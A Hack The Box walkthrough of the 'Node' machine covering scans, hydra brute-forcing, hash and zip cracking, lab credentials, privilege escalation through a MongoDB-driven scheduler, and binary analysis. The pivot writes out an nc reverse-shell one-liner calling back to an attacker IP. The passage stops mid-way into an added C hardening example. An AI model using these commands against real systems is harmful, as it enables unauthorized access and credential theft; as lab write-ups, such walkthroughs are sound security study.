Node

From Luniwiki

Node01.png

Ports scan

u505@kali:~/HTB/Machines/Node$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.58

Starting masscan 1.0.5 at 2020-05-15 22:13:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.58
Discovered open port 3000/tcp on 10.10.10.58
u505@kali:~/HTB/Machines/Node$ nmap -sC -sV 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:13 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.31 seconds
u505@kali:~/HTB/Machines/Node$ nmap -sC -sV -Pn 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:15 EDT
Nmap scan report for node.htb (10.10.10.58)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds

Web Enumeration

Node02.png

We have 3 users on the front page.

Node03.png

Node04.png

Dirsearch

u505@kali:~/HTB/Machines/Node$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,js" -r -R 4 -f -t 1000 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://node.htb:3000

[dirsearch v0.3.9 banner]
Extensions: txt, html, js | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 4
Error Log: /opt/utils/dirsearch/logs/errors-20-05-15_18-35-40.log
Target: http://node.htb:3000
[18:35:40] Starting:
Task Completed

Dirsearch is unable to enumerate any pages, but after a few tests we see that the login page is returned for every unknown path.

Brute force login page

Node05.png

Node06.png Node07.png

Node105.png

Node106.png Node107.png

We see that the message is different if the user is known. We can deduce that the user admin doesn't exist.

u505@kali:~/HTB/Machines/Node$ cat users.txt
mark
rastating
tom
u505@kali:~/HTB/Machines/Node$ hydra -L users.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.58 -s 3000 http-post-form "/api/session/authenticate:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:{\"success\"\:false}:H=Content-Type\: application/json" -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 16:30:02
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28311 login tries (l:3/p:9437), ~443 tries per task
[DATA] attacking http-post-form://10.10.10.58:3000/api/session/authenticate:{"username"\:"^USER^","password"\:"^PASS^"}:{"success"\:false}:H=Content-Type\: application/json
[3000][http-post-form] host: 10.10.10.58   login: mark   password: snowflake
[STATUS] 17858.00 tries/min, 17858 tries in 00:01h, 10453 to do in 00:01h, 64 active
[3000][http-post-form] host: 10.10.10.58   login: tom   password: spongebob
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 16:31:09

We found 2 passwords out of 3.

Node112.png Node113.png

But they are useless.

User hashes

Node08.png

There is a users API.

Node09.png Node10.png

We see the users, and password hashes.

Node11.png

If we go back up one folder, we retrieve the full list of users with their hashes and role. We find an admin user.

u505@kali:~/HTB/Machines/Node$ curl http://node.htb:3000/api/users/ | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   611  100   611    0     0   7833      0 --:--:-- --:--:-- --:--:--  7833
[
    {
        "_id": "59a7365b98aa325cc03ee51c",
        "is_admin": true,
        "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
        "username": "myP14ceAdm1nAcc0uNT"
    },
    {
        "_id": "59a7368398aa325cc03ee51d",
        "is_admin": false,
        "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
        "username": "tom"
    },
    {
        "_id": "59a7368e98aa325cc03ee51e",
        "is_admin": false,
        "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
        "username": "mark"
    },
    {
        "_id": "59aa9781cced6f1d1490fce9",
        "is_admin": false,
        "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
        "username": "rastating"
    }
]

We list the users and hashes.

u505@kali:~/HTB/Machines/Node$ cat apiuser.hash
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
rastating:5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

We try a dictionary attack against them.

u505@kali:~/HTB/Machines/Node$ hashid dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Analyzing 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)

It seems that the hashes are SHA-256.

u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...
...
u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester

We found 3 out of 4 passwords, including the admin password.

Log with admin user

Node12.png

We log in as the admin user.

Node13.png

This time there is a Download Backup button.

u505@kali:~/HTB/Machines/Node$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
u505@kali:~/HTB/Machines/Node$ head myplace.backup
UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWTAlv151eAsAAQQAAAAABAAAAABQSwMEFAAJAAgARQEiS0x97zc0EQAAEFMAACEAHAB2YXIvd3d3L215cGxhY2UvcGFja2FnZS1sb2NrLmpzb25VVAkAA9HoqVkwJb9edXgLAAEEAAAAAAQAAAAAgS+Bu1qnEne89oknmXE+3X+Sn7UnLI4PQ9DQ4abEF/C6ytQLOKbSNqVEdn4sgzNcP4tds65V9XBxxs7ZAuAhFHZdvx/BdUxI/8NV+WwWCgU43fR6ZkeEQ9uxY11ezlQ9R0dW4ULw

The file is base64-encoded.

u505@kali:~/HTB/Machines/Node$ cat myplace.backup | base64 -d > myplace.backup.decoded
u505@kali:~/HTB/Machines/Node$ file myplace.backup.decoded
myplace.backup.decoded: Zip archive data, at least v1.0 to extract
u505@kali:~/HTB/Machines/Node$ mv myplace.backup.decoded myplace.backup.decoded.zip
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive:  myplace.backup.decoded.zip
   creating: var/www/myplace/
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:

The zip file is encrypted.

u505@kali:~/HTB/Machines/Node$ zip2john myplace.backup.decoded.zip > zip.hash
u505@kali:~/HTB/Machines/Node$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword        (myplace.backup.decoded.zip)
1g 0:00:00:00 DONE (2020-05-15 19:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s sandrad..pigglett
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the password we unzip the zip file.

u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive:  myplace.backup.decoded.zip
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
  inflating: var/www/myplace/node_modules/serve-static/README.md
  inflating: var/www/myplace/node_modules/serve-static/index.js
  inflating: var/www/myplace/node_modules/serve-static/LICENSE
  inflating: var/www/myplace/node_modules/serve-static/HISTORY.md
  inflating: var/www/myplace/node_modules/serve-static/package.json
  inflating: var/www/myplace/node_modules/utils-merge/README.md
  inflating: var/www/myplace/node_modules/utils-merge/index.js
  inflating: var/www/myplace/node_modules/utils-merge/LICENSE
...

Access as mark

u505@kali:~/HTB/Machines/Node/var/www/myplace$ cat app.js
...
const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...

In app.js, the connection to the MongoDB database is made as user mark, with the password in clear text in the source file. We try to SSH with these credentials.

u505@kali:~/HTB/Machines/Node$ ssh mark@node.htb
The authenticity of host 'node.htb (10.10.10.58)' can't be established.
ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'node.htb,10.10.10.58' (ECDSA) to the list of known hosts.
mark@node.htb's password:

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3

Pivot to user Tom

Even before running enumeration scripts, we can easily notice that tom is running two processes.

mark@node:~$ ps -ef | grep tom
tom       1225     1  0 May15 ?        00:00:35 /usr/bin/node /var/www/myplace/app.js
tom       1240     1  0 May15 ?        00:00:02 /usr/bin/node /var/scheduler/app.js
mark      1602  1557  0 00:56 pts/0    00:00:00 grep --color=auto tom

The first one is the public application, but the second looks very interesting because of its folder name.

mark@node:~$ cat /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) { console.log('[!] Failed to connect to mongodb'); return; }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      } else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});

Every 30 seconds this scheduler reads every document in the tasks collection of the scheduler database, runs its cmd field with exec, and then deletes the document.

mark@node:~$ ls -l /var/scheduler/app.js
-rw-rw-r-- 1 root root 910 Sep  3  2017 /var/scheduler/app.js

We cannot modify the program, but we can access the database.

mark@node:~$ mongo mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
> show collections
tasks
> db.tasks.insertOne({cmd: "touch /tmp/u505"})
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5ebf2e8080c0e28198b78e14")
}
> db.tasks.count()
1

After a few seconds, the empty file exists:

mark@node:/tmp$ ls -l /tmp/u505
-rw-r--r-- 1 tom tom 0 May 16 01:06 /tmp/u505

And the document doesn't exist anymore:

> db.tasks.count()
0

We start a listener.

u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And insert a new document.

> db.tasks.insertOne({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.34 4444 >/tmp/f"})
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5ebf304c80c0e28198b78e16")
}
> db.tasks.count()
1

After a few seconds the shell opens as tom.

u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.58.
Ncat: Connection from 10.10.10.58:49090.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ stty raw -echo
stty raw -echo
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

I immediately noticed a group named admin with a high group id. This group is a homemade admin group.

User flag

As tom we are able to read the user flag.

tom@node:/$ cd
tom@node:~$ cat user.txt
<USER_FLAG>

Enumeration

Before running the enumeration script, I looked at that admin group.

tom@node:~$ find / -gid 1002 2>/dev/null
/usr/local/bin/backup
tom@node:~$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup

There is only one file with this group, and the file has the setuid bit set with root as owner. This is surely our entry point for privilege escalation.

u505@kali:~/HTB/Machines/Node$ scp mark@node.htb:/usr/local/bin/backup ./backupnode
mark@node.htb's password:
backup                                        100%   16KB 207.7KB/s   00:00

We copy the file locally for in-depth analysis.

Program analysis

Here is the decompilation of the main function of the Node backup binary.

And the control flow of the main function:

Node15.png

There is a call to displayTarget:

void displayTarget(char *param_1)
{
  char local_200 [508];

  strcpy(local_200,param_1);
  printf(" %s[+]%s Starting archiving %s\n",&DAT_08049359,&DAT_08049340,local_200);
  return;
}

The likelihood of a buffer overflow in displayTarget is very high: strcpy copies the parameter into the 508-byte local buffer without any length check, and main calls this function with the third command-line argument.

Key file

u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3



[ASCII-art banner: Secure Backup v1.0]

[!] Could not open file

As expected, with 3 arguments the program tries to open a file in order to compare the second argument with the token contained in it. The way the file name is built is very obscure in the decompiled code, so to see the actual value we run the program under ltrace and read the file name from the calls.

u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 2 3
__libc_start_main(0x80489fd, 4, 0xff9dae54, 0x80492c0 <unfinished ...>
geteuid()                                              = 1000
setuid(1000)                                           = 0
strcmp("1", "-q")                                      = 1
puts("\n\n\n             ________________"...               ) = 69
puts(" / "...                                              ) = 67
puts(" | ________________"...                              ) = 68
puts(" | | "...                                            ) = 68
...   (remaining banner puts() calls omitted)
puts("`---._.-------------------------"...                 ) = 82
strncpy(0xff9dad18, "2", 100)                          = 0xff9dad18
strcpy(0xff9dad01, "/")                                = 0xff9dad01
strcpy(0xff9dad0d, "/")                                = 0xff9dad0d
strcpy(0xff9dac97, "/e")                               = 0xff9dac97
strcat("/e", "tc")                                     = "/etc"
strcat("/etc", "/m")                                   = "/etc/m"
strcat("/etc/m", "yp")                                 = "/etc/myp"
strcat("/etc/myp", "la")                               = "/etc/mypla"
strcat("/etc/mypla", "ce")                             = "/etc/myplace"
strcat("/etc/myplace", "/k")                           = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                         = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                        = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                        = 0
strcpy(0xff9d98e8, "Could not open file\n\n")          = 0xff9d98e8
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Could not open file\n\n" [!] Could not open file

) = 37
exit(1 <no return ...>
+++ exited (status 1) +++

On the target server:

mark@node:~$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110

We have a valid key list, and we copy it to our system.

u505@kali:~/HTB/Machines/Node$ mkdir -p etc/myplace
u505@kali:~/HTB/Machines/Node$ vi etc/myplace/keys
u505@kali:~/HTB/Machines/Node$ cat etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ sudo ln -s /home/u505/HTB/Machines/Node/etc/myplace /etc/myplace
u505@kali:~/HTB/Machines/Node$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3



[ASCII-art banner: Secure Backup v1.0]

[!] Ah-ah-ah! You didn't say the magic word!

Now the program finds the key file, but refuses access because the token is not correct.

u505@kali:~/HTB/Machines/Node$ ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder



[ASCII-art banner: Secure Backup v1.0]

[+] Validated access token [+] Starting archiving nofolder [!] The target path doesn't exist

This time the token is validated, but the program complains that the folder nofolder doesn't exist.

Not allowed characters

u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
__libc_start_main(0x80489fd, 4, 0xff970c94, 0x80492c0 <unfinished ...>
geteuid()                                              = 1000
setuid(1000)                                           = 0
strcmp("1", "-q")                                      = 1
puts("\n\n\n             ________________"...               ) = 69
puts(" / "...                                              ) = 67
...   (remaining banner puts() calls omitted)
puts("`---._.-------------------------"...                 ) = 82
strncpy(0xff970b58, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff970b58
strcpy(0xff970b41, "/")                                = 0xff970b41
strcpy(0xff970b4d, "/")                                = 0xff970b4d
strcpy(0xff970ad7, "/e")                               = 0xff970ad7
strcat("/e", "tc")                                     = "/etc"
strcat("/etc", "/m")                                   = "/etc/m"
strcat("/etc/m", "yp")                                 = "/etc/myp"
strcat("/etc/myp", "la")                               = "/etc/mypla"
strcat("/etc/mypla", "ce")                             = "/etc/myplace"
strcat("/etc/myplace", "/k")                           = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                         = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                        = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                        = 0x97d25b0
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n")   = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n")   = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
strcpy(0xff96f728, "Validated access token")           = 0xff96f728
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Validated access token" [+] Validated access token
) = 38
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n")   = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0
strstr("nofolder", "..")                               = nil
strstr("nofolder", "/root")                            = nil
strchr("nofolder", ';')                                = nil
strchr("nofolder", '&')                                = nil
strchr("nofolder", '`')                                = nil
strchr("nofolder", '$')                                = nil
strchr("nofolder", '|')                                = nil
strstr("nofolder", "//")                               = nil
strcmp("nofolder", "/")                                = 1
strstr("nofolder", "/etc")                             = nil
strcpy(0xff96f91c, "nofolder")                         = 0xff96f91c
printf(" %s[+]%s Starting archiving %s\n", "\033[32m", "\033[37m", "nofolder" [+] Starting archiving nofolder
) = 43
strcpy(0xff9704fb, "nofolder")                         = 0xff9704fb
getpid()                                               = 8639
time(0)                                                = 1590009614
clock(0, 0, 0, 0)                                      = 3247
srand(0x5e3d042d, 0x7243d4de, 0x5e3d042d, 0x804918c)   = 0
rand(0, 0, 0, 0)                                       = 0x6a7838b2
sprintf("/tmp/.backup_1786263730", "/tmp/.backup_%i", 1786263730) = 23
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1786263730", "nofolder") = 73
system("/usr/bin/zip -r -P magicword /tm"... <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                 = 3072
access("/tmp/.backup_1786263730", 0)                   = -1
strcpy(0xff96f728, "The target path doesn't exist")    = 0xff96f728
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "The target path doesn't exist" [!] The target path doesn't exist
) = 45
puts("\n"

) = 2
remove("/tmp/.backup_1786263730")                      = -1
fclose(0x97d25b0)                                      = 0
+++ exited (status 0) +++

The third argument cannot begin with

  • /

or contain

  • /root
  • ;
  • &
  • `
  • $
  • |
  • //
  • /etc

For example, if we try a folder that is not allowed:

u505@kali:~/HTB/Machines/Node$ ./backupnode abc a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root/



[ASCII-art banner: Secure Backup v1.0]

[+] Validated access token
[+] Finished! Encoded backup is below:
...
u505@kali:~/HTB/Machines/Node$ cat output.b64
...
u505@kali:~/HTB/Machines/Node$ cat output.b64 | base64 -d > output
u505@kali:~/HTB/Machines/Node$ file output
output: Zip archive data, at least v?[0x333] to extract
u505@kali:~/HTB/Machines/Node$ mv output output.zip
u505@kali:~/HTB/Machines/Node$ unzip output.zip
Archive:  output.zip
   skipping: root.txt                need PK compat. v5.1 (can do v4.6)
u505@kali:~/HTB/Machines/Node$ 7z e output.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)

Extracting archive: output.zip
--
Path = output.zip
Type = zip
Physical Size = 1141

Enter password (will not be echoed): magicword
Everything is Ok

Size:       2584
Compressed: 1141

But the file root.txt is a troll face.

u505@kali:~/HTB/Machines/Node$ cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
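The two weaknesses noted above, the unbounded strcpy in displayTarget and the substring denylist on the target path, have a standard fix: bound the copy, and allowlist the canonical path instead of searching for bad substrings. The following C is an added example written for this page, not code from the backup binary or from Hack The Box; the function names, the /tmp backup root and the constructed inputs are assumptions.

```c
#define _XOPEN_SOURCE 700      /* declares realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same size as the local buffer in the decompiled displayTarget. */
#define TARGET_MAX 508

/* Length of s without ever looking past max bytes, so a 1000-byte argument is
 * detected without being scanned or copied in full. */
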